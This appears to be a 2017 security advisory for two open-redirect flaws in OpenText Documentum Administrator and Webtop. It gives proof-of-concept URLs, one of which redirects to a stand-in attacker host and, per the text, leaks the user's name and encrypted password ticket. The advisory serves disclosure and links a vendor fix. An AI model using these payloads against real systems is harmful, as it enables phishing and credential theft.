OpenText Documentum Administrator / Webtop Open Redirection

2017.09.27
Risk: Low
Local: No
Remote: Yes
CWE: CWE-601

Title: OpenText Documentum Administrator and Webtop - Open Redirection Author: Jakub Palaczynski Date: 24. September 2017 CVE (Administrator): CVE-2017-14524 CVE (Webtop): CVE-2017-14525 Affected software: ================== Documentum Administrator Documentum Webtop Exploit was tested on: ====================== Documentum Administrator version 7.2.0180.0055 Documentum Webtop version 6.8.0160.0073 Other versions may also be vulnerable. Open Redirection - 2 instances: ======================== Please note that examples below are for Documentum Administrator, but the same exploitation takes place in Webtop. 1. First instance: It is possible to frame custom/malicious website on a trusted domain. This way an attacker may for example steal credentials via creating fake login form or redirect users to a malicious website. Proof of Concept: https://DOCUMENTUM/xda/help/en/default.htm?startat=//127.0.0.1/custom.html 2. Second instance: It is possible to redirect user to custom website. Besides redirection it also allows for stealing sensitive data - before redirection takes place application appends username and base64 encoded user's encrypted password ("ticket" parameter). Proof of Concept: Please note that PoC below works only in Internet Explorer browser as only this browser treats /%09/ as //, which makes redirection work. https://DOCUMENTUM/xda/component/virtuallinkconnect?redirectUrl=%2F%09%2Fattacker.com%2F&virtualLinkPath=%2F Fix: === https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 Contact: ====== Jakub[dot]Palaczynski[at]gmail[dot]com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top